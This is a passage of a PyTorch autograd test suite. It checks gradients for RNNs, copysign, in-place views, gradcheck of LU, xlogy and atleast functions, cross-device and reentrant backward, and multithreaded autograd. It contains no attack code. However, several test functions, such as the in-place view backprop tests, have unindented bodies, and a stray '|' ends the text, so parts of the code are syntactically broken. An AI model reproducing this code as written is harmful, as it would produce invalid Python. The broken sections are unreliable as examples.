    # That would require something a great deal more complex (you'd have to create a
    # profile in a subprocess, open it, and parse the sql somehow).
    # This test is merely intended to catch if emit_nvtx breaks on construction.
    a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
    with torch.cuda.profiler.profile():
        with emit_nvtx():
            a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
    """An LSTM with frozen weights must still produce input gradients."""
    # this checks whether it is possible to not require
    # weight parameters, but require inputs, see #7722
    l = torch.nn.LSTM(2, 3).to(device)
    for p in l.parameters():
        p.requires_grad = False
    s = torch.randn(1, 1, 2, requires_grad=True, device=device)
    out, _ = l(s)
    out.sum().backward()
    # The input grad must exist and be non-trivially non-zero.
    self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
    # checks that undefined gradients doesn't hamper the backward
    # see #11872
    l = torch.nn.LSTMCell(2, 3).to(device).double()
    s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
    # Backprop from each of the two LSTMCell outputs (h, c) independently,
    # leaving the other output's gradient undefined.
    for i in range(2):
        out = l(s)[i]
        out.sum().backward()
        self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
    """Helper: gradcheck/gradgradcheck an RNN module (with cuDNN disabled),
    then verify the cuDNN double-backward limitation raises a clear error."""
    def flatten_out(mod, inp):
        # Flatten the module's (output, hidden-states) structure into a
        # flat tuple of tensors for gradcheck.
        out = mod(inp)
        return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
    gradcheckfunc = partial(flatten_out, mod)
    with torch.backends.cudnn.flags(enabled=False):
        gradcheck(gradcheckfunc, inp, check_batched_grad=False)
        gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)

    if inp.is_cuda and not TEST_WITH_ROCM:
        # Assert that we have good error message around unsupported CuDNN double backward
        # NB: we trigger double backward using .backward() instead of autograd.grad due to
        # https://github.com/pytorch/pytorch/issues/37874
        with torch.backends.cudnn.flags(enabled=True):
            result = gradcheckfunc(inp)
            result[0].sum().backward(create_graph=True)
            grad0 = next(mod.parameters()).grad
            with self.assertRaisesRegex(RuntimeError,
                                        "please disable the CuDNN backend temporarily"):
                grad0.sum().backward()

            # Here we avoid the backward(create_graph=True) memory leak
            # described in https://github.com/pytorch/pytorch/issues/7343
            for param in mod.parameters():
                param.grad = None
            inp.grad = None
def test_LSTM_grad_and_gradgrad(self, device):
    """gradcheck/gradgradcheck an LSTM, with and without bias."""
    hsize = 4
    inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
    for bias in [True, False]:
        mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
        self._test_rnn_mod(mod, inp)
def test_GRU_grad_and_gradgrad(self, device):
    """gradcheck/gradgradcheck a GRU, with and without bias."""
    hsize = 4
    inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
    for bias in [True, False]:
        mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
        self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
    """copysign subgradients at the non-differentiable points: signed-zero
    inputs and signed-zero `other` (sign source) values. `other` always
    gets a zero gradient."""
    # Input is 0.0
    x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
    y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
    out = torch.copysign(x, y)
    out.sum().backward()
    self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
    self.assertEqual(y.grad.tolist(), [0.0] * 3)

    # Input is -0.0
    x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
    y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
    out = torch.copysign(x, y)
    out.sum().backward()
    self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
    self.assertEqual(y.grad.tolist(), [0.0] * 3)

    # Other is 0.0
    x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
    y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
    out = torch.copysign(x, y)
    out.sum().backward()
    self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
    self.assertEqual(y.grad.tolist(), [0.0] * 3)

    # Other is -0.0
    x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
    y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
    out = torch.copysign(x, y)
    out.sum().backward()
    self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
    self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
    """Assigning to .grad validates shape, dtype and device of the value."""
    x = torch.randn(5, 5, device=devices[0])

    # Tests that the wrong shape raises
    with self.assertRaises(RuntimeError):
        x.grad = torch.randn(2, 2, device=devices[0])

    # Tests that the wrong dtype raises
    with self.assertRaises(RuntimeError):
        x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])

    # Tests that self-assignment raises
    with self.assertRaises(RuntimeError):
        x.grad = x

    # Tests device -> cpu grad assignment raises
    if self.device_type != 'cpu':
        with self.assertRaises(RuntimeError):
            t_cpu = torch.rand(5, 5)
            t_cpu.grad = torch.randn(5, 5, device=devices[0])

    # Tests half type on CUDA
    if self.device_type == 'cuda':
        x = x.to(dtype=torch.half, device=devices[0])
        x.grad = torch.zeros_like(x)

    # Tests cross-device assignment raises
    if len(devices) > 1:
        x = torch.randn(5, 5, device=devices[0])
        with self.assertRaises(RuntimeError):
            x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
    """`*_like` factory functions must honor requires_grad/dtype/device."""
    fns = [torch.ones_like, torch.testing.randn_like]
    x = torch.randn(2, 3, dtype=dtype, device=devices[0])

    for fn in fns:
        for requires_grad in [True, False]:
            output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
            self.assertEqual(requires_grad, output.requires_grad)
            self.assertIs(dtype, output.dtype)
            self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
    """Backward through Broadcast when only the last replica is used; the
    source still receives the full gradient."""
    from torch.nn.parallel._functions import Broadcast
    x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
    outputs = Broadcast.apply(list(range(len(devices))), x)
    y = outputs[-1] * 2
    y.sum().backward()
    # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
    self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
    # check that current device matches the variable's device
    device = [None]

    class Identity(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x.clone()

        @staticmethod
        def backward(ctx, grad_output):
            # Record which device the incoming gradient lives on.
            device[0] = grad_output.device
            return grad_output.clone()

    v = torch.randn(1, device=devices[1], requires_grad=True)
    Identity.apply(v).backward()
    self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
    """Accumulating two gradients for one input across devices must work."""
    input = torch.randn(1, device=devices[0], requires_grad=True)
    output = input.to(device=devices[1]) + input.to(device=devices[1])
    output.backward()
@onlyCPU
def test_copy_(self, device):
    """copy_ into any floating dtype must preserve requires_grad
    (bfloat16 included)."""
    # At the time of writing this test, copy_ is not generated from native_functions.yaml
    # there was a bug that bfloat16 was not recognized as floating.
    x = torch.randn(10, device=device, requires_grad=True)
    floating_dt = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
    for dt in floating_dt:
        y = torch.empty(10, device=device, dtype=dt)
        y.copy_(x)
        self.assertTrue(y.requires_grad)
        z = x.to(torch.bfloat16)
        self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
    """Reentrant backward that hops between the CPU and GPU autograd threads."""
    class ReentrantFunc(Function):
        # Toggles which device the reentrant backward graph lives on.
        _cpu_mode = True

        @staticmethod
        def forward(ctx, x):
            return x * (x + 2)

        @staticmethod
        def backward(ctx, grad_output):
            with torch.enable_grad():
                if ReentrantFunc._cpu_mode:
                    new_param = torch.randn(2, 2, requires_grad=True)
                    (new_param ** 2).sum().backward()
                else:
                    new_param = torch.randn(2, 2, device=device, requires_grad=True)
                    (new_param ** 2).sum().backward()
            return grad_output

    # Reentrant starts on GPU thread, finishes on GPU thread
    x = torch.randn(2, 2, device=device, requires_grad=True)
    out = ReentrantFunc.apply(x)
    out.sum().backward()

    # Reentrant starts on CPU thread, finishes on GPU thread
    x = torch.randn(2, 2, requires_grad=True)
    # set ReentrantFunc node to GPU to emit tasks to GPU queue
    ReentrantFunc._cpu_mode = False
    out = ReentrantFunc.apply(x)
    out.sum().backward()

    # Reentrant starts on GPU thread, finishes on CPU thread
    x = torch.randn(2, 2, device=device, requires_grad=True)
    # set ReentrantFunc node to CPU to emit tasks to CPU queue
    ReentrantFunc._cpu_mode = True
    out = ReentrantFunc.apply(x)
    out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
    """Regression test: an empty NodeTask sent from the CPU thread to the
    GPU thread's ReadyQueue must be handled (this used to segfault)."""
    # Output on gpu so that this task will be associated with the gpu thread
    def fn_on_gpu(inp):
        # Artificially increase the priority of the next op to make sure it runs
        # as soon as we reach it before the ops of branch1.
        dummy = inp * 2 * 2 * 2 * 2
        return inp.to(device=device)

    def parent_on_cpu(inp):
        # Slow branch of ops on gpu so that the work queue for the gpu thread
        # won't empty too quickly. They also have smaller priorities than the
        # ones created by fn_on_gpu
        branch1 = inp.to(device=device)
        branch1 = branch1 / branch1
        branch1 = branch1 / branch1
        branch1 = branch1 / branch1
        # Perform checkpoint on cpu tensors. So the last op performed in the reentrant
        # autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
        # So the cpu thread will notify the gpu thread with an empty NodeTask.
        branch2 = checkpoint(fn_on_gpu, inp)
        out = branch2 + branch1
        return out

    inp = torch.rand(2, requires_grad=True)
    out = parent_on_cpu(inp)
    # This will segfault if the empty NodeTask is not handled properly in the
    # gpu thread ReadyQueue
    out.sum().backward()
def test_inplace_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_view_then_no_grad(self, device):
    """Touching grad_fn of a modified view while grad is disabled must not
    corrupt the graph used by a later backward."""
    # Perform an in-place operation on a view of a non-leaf variable.
    a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
    b = a * 2
    c = b.view_as(b)
    c[0][0] = 3

    # Force a graph update with grad disabled.
    with torch.no_grad():
        c.grad_fn

    c.sum().backward()
def test_inplace_view_gradcheck(self, device):
    """gradcheck/gradgradcheck a function that mutates overlapping narrow
    views of a cloned input in place."""
    # gradcheck modifications to views
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
    b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)

    def func(root, b):
        x = root.clone()
        x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
        x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
        return x

    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_view_of_multiple_output_view(self, device):
    """Mutating a view taken of one output of a multi-output view (unbind)
    must raise."""
    a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
    b = a.unbind(0)
    c = b[0].view_as(b[0])
    with self.assertRaises(RuntimeError):
        c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
    """Mutating an output of a multi-output view (unbind) taken of another
    view must raise."""
    a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
    b = a.view_as(a)
    c = b.unbind(0)
    with self.assertRaises(RuntimeError):
        c[0].mul_(2)
def test_inplace_view_makes_base_require_grad(self, device):
    """In-place multiplication by a requires-grad tensor through a view
    must flip requires_grad on the previously grad-free base."""
    # in-place modification to view makes base require grad
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
    b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)

    def func(root, b):
        x = root.clone()
        self.assertFalse(x.requires_grad)
        x.narrow(1, 2, 2).mul_(b)
        self.assertTrue(x.requires_grad)
        return x

    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_view_modify_base(self, device):
    # Test that an in-place operation on a base that forced it to require
    # grad also forces any previous views to require grad and backprop
    # correctly
    r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)

    def fn(r):
        x = torch.ones(5, dtype=torch.double, device=device)
        v = x.select(0, 1)
        self.assertFalse(v.requires_grad)
        self.assertIsNone(v.grad_fn)
        x.add_(r)  # v is now dependent on r due to the in-place op on x
        self.assertTrue(v.requires_grad)
        return v

    gradcheck(fn, [r])
    gradgradcheck(fn, [r])
def test_inplace_view_python(self, device):
    """In-place modifications through views made by a Python autograd
    Function (using ctx.mark_dirty) must pass gradcheck."""
    # in-place modifications of Python-autograd created view
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
    b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)

    class PyAdd(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x, y):
            ctx.mark_dirty(x)
            x.add_(y)
            return x

        @staticmethod
        def backward(ctx, grad):
            return grad, grad

    def func(root, b):
        x = root.clone()
        PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
        PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
        return x

    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_view_non_contig(self, device):
    """Same in-place view-of-view scenario as test_inplace_view_of_view,
    but with a non-contiguous root (select + transpose)."""
    root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
    x = root.clone()
    v1 = x.narrow(0, 0, 1)
    v2 = v1.narrow(1, 1, 1)
    v2.mul_(2)
    x.sum().backward()
    self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_view_multi_output_unsafe(self, device):
    """unsafe_split / unsafe_split_with_sizes / unsafe_chunk outputs may
    be mutated in place without raising (unlike the safe variants)."""
    for f in [lambda t: t.unsafe_split(1),
              lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
              lambda t: t.unsafe_chunk(3)]:
        a = torch.randn(3, 3, device=device, requires_grad=True)
        b = a + a
        s1, s2, s3 = f(b)
        s1.mul_(s2)
        s1.sum().backward()
def test_inplace_view_multi_output_safe(self, device):
    """split / split_with_sizes / chunk outputs must reject in-place
    mutation with the documented error message."""
    for f in [lambda t: t.split(1),
              lambda t: t.split_with_sizes((1, 1, 1)),
              lambda t: t.chunk(3)]:
        a = torch.randn(3, 3, device=device, requires_grad=True)
        b = a + a
        s1, s2, s3 = f(b)
        error_msg = 'This view is an output of a function that returns multiple views.'
        with self.assertRaisesRegex(RuntimeError, error_msg):
            s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
    """Gradcheck mat @ vec where vec is a stride-0 expansion of a single
    element. Reference: https://github.com/pytorch/pytorch/issues/38315

    Fix: gradcheck/gradgradcheck were called with `(vec)` — which is just
    `vec`, not a tuple. gradcheck happens to accept a bare tensor, so
    behavior was unaffected, but the explicit one-element tuple is the
    intended idiom.
    """
    mat = torch.randn(2, 2, dtype=torch.double, device=device)
    vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)

    def fn(vec):
        # Expand inside the function to make sure the input to
        # gradcheck does not have overlapping memory
        vec = vec.expand(2)
        return (mat @ vec).sum()

    gradcheck(fn, (vec,))
    gradgradcheck(fn, (vec,))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
    """gradcheck must handle functions whose output lives on a different
    device than the input (cuda->cpu and cpu->cuda copies)."""
    x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
    gradcheck(lambda x: x.to("cpu"), (x,))

    x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
    gradcheck(lambda x: x.to("cuda"), (x,))
def test_logcumsumexp_large_value(self, device):
    """logcumsumexp gradients must stay finite with large-magnitude
    entries, along every dimension.

    Fix: the input tensor previously ignored the `device` parameter, so
    non-CPU instantiations of this device-type test silently ran on the
    default device; it is now created on `device`. The three per-dim
    check pairs are folded into a loop.
    """
    a = torch.rand(4, 4, 4, dtype=torch.double, device=device, requires_grad=True)
    with torch.no_grad():
        # Large Number
        a[0] = 10000

    for dim in (0, 1, 2):
        gradcheck(lambda x: x.logcumsumexp(dim), a)
        gradgradcheck(lambda x: x.logcumsumexp(dim), a)
@slowTest
def test_lu_backward(self, device):
    """gradcheck/gradgradcheck torch.lu over several (batched) shapes,
    with and without infos, and without pivoting on CUDA."""
    def run_test(*sizes):
        x = torch.rand(*sizes, device=device, dtype=torch.double).requires_grad_(True)

        gradcheck(lambda x: x.lu(get_infos=True), x)
        gradgradcheck(lambda x: x.lu(get_infos=True), x)

        gradcheck(lambda x: x.lu(get_infos=False), x)
        gradgradcheck(lambda x: x.lu(get_infos=False), x)

        # there is no pivot-less LU factorization on CPU
        if x.device.type == 'cuda':
            gradcheck(lambda x: x.lu(pivot=False, get_infos=True), x)
            gradgradcheck(lambda x: x.lu(pivot=False, get_infos=True), x)

            gradcheck(lambda x: x.lu(pivot=False, get_infos=False), x)
            gradgradcheck(lambda x: x.lu(pivot=False, get_infos=False), x)

    run_test(3, 3)
    run_test(3, 3, 3)
    run_test(3, 3, 3, 3)
    run_test(5, 5)
    run_test(3, 5, 5)
    run_test(3, 3, 5, 5)
def test_strided_leaf_grad_layout(self, device):
    """Gradient strides of leaf tensors: dense leaves get grads matching
    their own layout; non-dense leaves get rowmajor-contiguous grads."""
    # (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
    for fmt_a in (torch.contiguous_format, torch.channels_last):
        for fmt_b in (torch.contiguous_format, torch.channels_last):
            a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
            b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
            a.requires_grad_()
            b.requires_grad_()
            # checks (1) for broadcasted gradients
            a.sum().backward()
            self.assertEqual(a.grad.stride(), a.stride())
            b.sum().backward()
            self.assertEqual(b.grad.stride(), b.stride())
            # checks (1) for non-broadcasted gradients
            a.grad = None
            b.grad = None
            (a * b).sum().backward()
            self.assertEqual(a.grad.stride(), a.stride())
            self.assertEqual(b.grad.stride(), b.stride())

    # (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
    c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
    c.requires_grad_()
    d = torch.rand((2, 2), device=device)
    # checks (2) for broadcasted gradients
    c.sum().backward()
    self.assertEqual(c.grad.stride(), (2, 1))
    # checks (2) for non-broadcasted gradients
    c.grad = None
    (c * d).sum().backward()
    self.assertEqual(c.grad.stride(), (2, 1))
def _test_atleast(self, device, torch_fn):
    """Shared helper: gradcheck/gradgradcheck torch_fn on 0- to 4-dim
    inputs, both individually and passed together as a tuple.

    NOTE(review): all inputs are created on the default device; the
    `device` parameter is unused here — confirm this is intended.
    """
    # 0-dim
    s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
    gradcheck(lambda x: torch_fn(x), s)
    gradgradcheck(lambda x: torch_fn(x), s)

    # 1-dim
    a = torch.rand(4, dtype=torch.double, requires_grad=True)
    gradcheck(lambda x: torch_fn(x), a)
    gradgradcheck(lambda x: torch_fn(x), a)

    # 2,3,4-dim
    b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
    c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
    d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)

    input_tuple = (s, a, b, c, d)
    gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
    gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
    """Run the shared atleast gradcheck suite for 1d, 2d and 3d variants."""
    for torch_fn in (torch.atleast_1d, torch.atleast_2d, torch.atleast_3d):
        self._test_atleast(device, torch_fn)
def test_xlogy(self, device):
    """gradcheck torch.xlogy for tensor/tensor pairs over broadcastable
    shapes, for scalar/tensor and tensor/scalar, including x == 0 entries."""
    def _tensor_tensor_helper(x, y):
        gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
        gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))

        # Zero out a random subset of x to exercise the x == 0 branch.
        with torch.no_grad():
            x = x.clone()
            x[torch.rand_like(x) > 0.5] = 0

        # NOTE(review): `(y)` below is just `y`, not a 1-tuple; gradcheck
        # accepts a bare tensor, so behavior is unchanged.
        gradcheck(lambda y: torch.xlogy(x, y), (y))
        gradgradcheck(lambda y: torch.xlogy(x, y), (y))

    shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))

    # For broadcastible shapes and scalar.
    for x_shape, y_shape in permutations(shapes, 2):
        x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
        y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)

        _tensor_tensor_helper(x, y)
        _tensor_tensor_helper(y, x)

        gradcheck(lambda y: torch.xlogy(0, y), (y))
        gradgradcheck(lambda y: torch.xlogy(0, y), (y))

        gradcheck(lambda y: torch.xlogy(2, y), (y))
        gradgradcheck(lambda y: torch.xlogy(2, y), (y))
        gradcheck(lambda y: torch.xlogy(y, 2), (y))
        gradgradcheck(lambda y: torch.xlogy(y, 2), (y))

    # Different shape
    x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    _tensor_tensor_helper(x, y)
    _tensor_tensor_helper(y, x)
    _tensor_tensor_helper(x, x)
    _tensor_tensor_helper(y, y)

    # Same shape
    x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    _tensor_tensor_helper(x, y)
    _tensor_tensor_helper(y, x)
    _tensor_tensor_helper(x, x)
    _tensor_tensor_helper(y, y)
class TestMultithreadAutograd(TestCase):
    """Autograd driven concurrently from multiple Python threads:
    Hogwild-style shared-input backward, Y-shaped graphs shared across
    threads, TorchScript fork/join, and traceback preservation."""

    def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
        """Run fn(*args, **kwargs) on `num_threads` threads and join them.

        Fix: `kwargs` was previously accepted but never forwarded to the
        thread target; it is now passed through (None means none). The
        misleading non-tuple parenthesization `args=(args)` is also gone.
        """
        threads = []
        for _ in range(num_threads):
            p = threading.Thread(target=fn, args=args, kwargs=kwargs or {})
            p.start()
            threads.append(p)
        for p in threads:
            p.join()

    def test_simple_backward(self):
        # simple multithreaded backward that create threads in the beginning of training
        # and everything else is training separately, i.e. inputs, operations, etc.
        def train_fn():
            x = torch.ones(5, 5, requires_grad=True)
            y = (x + 3) * (x + 4) * 0.5
            y.sum().backward()
            self.assertEqual(x.grad, x + 3.5)

        self._run_py_multithread_fn(train_fn)

    def test_simple_backward_same_input(self):
        # simple multithreaded backward with only shared inputs (i.e. This is common
        # for things like Hogwild multithreaded training with multiple CPU threads)
        def train_fn_backward(x):
            y = (x + 3) * (x + 4) * 0.5
            y.sum().backward()

        x = torch.ones(5, 5, requires_grad=True)
        self._run_py_multithread_fn(train_fn_backward, (x,))
        # Since we are calling backward from multiple threads
        # and all threads share the same input, when we do backward
        # concurrently, different backwards will all accumulate to
        # the same .grad for each input, and the gradients should
        # be equal to num_threads * gradient
        self.assertEqual(x.grad, 10 * (x + 3.5))

        def train_fn_grad(x):
            y = (x + 3) * (x + 4) * 0.5
            grads = torch.autograd.grad(y.sum(), x)
            self.assertEqual(len(grads), 1)
            self.assertEqual(grads[0], x + 3.5)

        # since we use functional grad() api, gradients will not
        # be accumulate to the same place and should be the same
        self._run_py_multithread_fn(train_fn_grad, (x,))

    def test_python_thread_in_middle(self):
        # User might write a network that starts on one CPU thread, then runs its second half
        # concurrently with other threads (either via python threading or fork/join calls),
        # then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
        # bottom to output at the top. This way part of the GraphTask is being shared across
        # different threads and we need to ensure user specify retain_graph=True, otherwise
        # error out with the correct error message

        # Case 1: multiple backward with python threads, retain_graph=False
        # should throw error in some threads with no retain_graph.
        success_vs_raises = [0, 0]

        def train_fn_no_retain_graph(x):
            y = x + x ** 2
            try:
                y.sum().backward()
                success_vs_raises[0] += 1
            except RuntimeError as error:
                success_vs_raises[1] += 1
                self.assertRegex(str(error), "Specify retain_graph=True")

        x_no_retain = torch.ones(5, 5, requires_grad=True)
        y_no_retain = x_no_retain + x_no_retain ** 2
        self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
        # at least one thread will be success in this case, all other threads should raise
        # with the error that throw to user to recommend them specify retain_graph=True
        self.assertTrue(success_vs_raises[0] >= 1)

        # multiple backward with python threads, no error with retain_graph=True
        def train_fn_retain_graph(x):
            y = x + x ** 2
            y.sum().backward(retain_graph=True)

        x_retain = torch.ones(5, 5, requires_grad=True)
        y_retain = x_retain + x_retain ** 2
        self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
        # result should equal to num_thread * gradients
        self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))

    def test_fork_join_in_middle(self):
        # multiple backward with jit threads (fork/join primitive)
        # similar to test_python_thread_in_middle, we test with retain_graph=False/True

        # Case 1: multiple grad() calls with jit threads, retain_graph=False
        # should throw error in some threads with no retain_graph.
        @torch.jit.script
        def train_fn_jit_no_retain(middle, orig_x):
            y = middle + middle ** 2
            return torch.autograd.grad([y.sum()], [orig_x])

        @torch.jit.script
        def train_fn_fork_join_calls_no_retain(x):
            y_no_retain = (x + 3) * (x + 4) * 0.5

            fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
            grad_hat = train_fn_jit_no_retain(y_no_retain, x)
            grad = torch.jit._wait(fut)
            return grad, grad_hat

        try:
            train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
        except RuntimeError as error:
            self.assertRegex(str(error), "Specify retain_graph=True")

        # Case 2: no error with retain_graph=True
        @torch.jit.script
        def train_fn_jit_retain(middle, orig_x):
            y = middle + middle ** 2
            return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)

        @torch.jit.script
        def train_fn_fork_join_calls_retain(x):
            y_retain = (x + 3) * (x + 4) * 0.5
            fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
            fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
            grad = train_fn_jit_retain(y_retain, x)
            grad1 = torch.jit._wait(fut1)
            grad2 = torch.jit._wait(fut2)
            return grad, grad1, grad2

        grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
        self.assertEqual(grad, grad1)
        self.assertEqual(grad, grad2)

    def test_preserve_backtrace(self):
        # An exception raised inside a custom Function's backward must keep
        # its original traceback (including the raising line) when it
        # surfaces from .backward().
        class Foo(torch.autograd.Function):
            @staticmethod
            def forward(ctx, input):
                return input

            @staticmethod
            def backward(ctx, *grad):
                raise ValueError("something")

        t = torch.rand(10, requires_grad=True)
        try:
            Foo.apply(t).sum().backward()
        except Exception:
            import traceback
            tb = sys.exc_info()[2]
            tb_str = "\n".join(traceback.format_tb(tb))
            self.assertTrue('raise ValueError("something")' in tb_str)
# Instantiate the legacy parametrized method tests.
for test in method_tests():
    add_test(*test)

# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
    TestAutogradDeviceType,
    globals(),
    except_for=None
)

if __name__ == '__main__':
    run_tests()
|
